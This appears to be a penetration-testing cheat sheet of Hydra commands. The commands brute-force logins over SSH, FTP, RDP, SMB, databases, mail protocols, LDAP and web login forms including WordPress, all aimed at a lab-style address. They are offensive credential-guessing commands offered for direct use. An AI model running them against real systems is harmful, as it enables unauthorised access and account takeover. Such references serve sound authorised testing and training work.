← All Cheatsheets

exploitation

Hydra — Online Password Brute Force

Hydra is a fast, parallelized online password cracker supporting 50+ protocols.

12 views Apr 2026 lazyhackers

SSH, FTP, RDP (6)

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1

SSH brute force single username

ssh bruteforce

hydra -L users.txt -P passwords.txt ssh://10.10.10.1

SSH brute force user+pass lists

ssh bruteforce

hydra -l root -P passwords.txt ftp://10.10.10.1

FTP brute force

ftp bruteforce

hydra -l administrator -P passwords.txt rdp://10.10.10.1

RDP brute force

rdp bruteforce windows

hydra -L users.txt -P passwords.txt -t 4 rdp://10.10.10.1

RDP with 4 threads (RDP is slow)

rdp bruteforce

hydra -l admin -P passwords.txt ssh://10.10.10.1 -t 10 -s 2222

SSH on non-standard port 2222

ssh port

Web Forms (HTTP) (4)

hydra -l admin -P rockyou.txt http-post-form "//login:username=^USER^&password=^PASS^:Invalid credentials" 10.10.10.1

HTTP POST form brute force

http post web

hydra -l admin -P rockyou.txt http-get-form "//login:user=^USER^&pass=^PASS^:F=Wrong" 10.10.10.1

HTTP GET form brute force

http get web

hydra -l admin -P rockyou.txt -s 443 -S https-post-form "//login:user=^USER^&pass=^PASS^:F=error" 10.10.10.1

HTTPS POST form brute force

https post web

hydra -l admin -P rockyou.txt http-post-form "//wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect" 10.10.10.1

WordPress wp-login.php brute force

http wordpress

Other Protocols (8)

hydra -l admin -P passwords.txt smb://10.10.10.1

SMB/Windows shares brute force

smb windows

hydra -l admin -P passwords.txt mysql://10.10.10.1

MySQL brute force

mysql database

hydra -l admin -P passwords.txt mssql://10.10.10.1

MSSQL brute force

mssql database

hydra -l admin -P passwords.txt telnet://10.10.10.1

Telnet brute force

telnet

hydra -l admin -P passwords.txt smtp://10.10.10.1

SMTP brute force

smtp email

hydra -l admin -P passwords.txt pop3://10.10.10.1

POP3 brute force

pop3 email

hydra -l admin -P passwords.txt ldap://10.10.10.1

LDAP brute force

ldap ad

hydra -C creds.txt ssh://10.10.10.1

Use colon-separated credential file (user:pass)

combo

Speed & Output (4)

hydra -l admin -P rockyou.txt ssh://10.10.10.1 -t 20 -w 30 -vV

20 tasks, 30s timeout, verbose output

speed verbose

hydra -l admin -P rockyou.txt ssh://10.10.10.1 -o results.txt

Save found credentials to file

output

hydra -l admin -P rockyou.txt ssh://10.10.10.1 -R

Restore previous interrupted session

resume

hydra -l admin -P rockyou.txt ssh://10.10.10.1 -x 4:6:aA1

Generate passwords: 4-6 chars, lower+upper+digits

generate bruteforce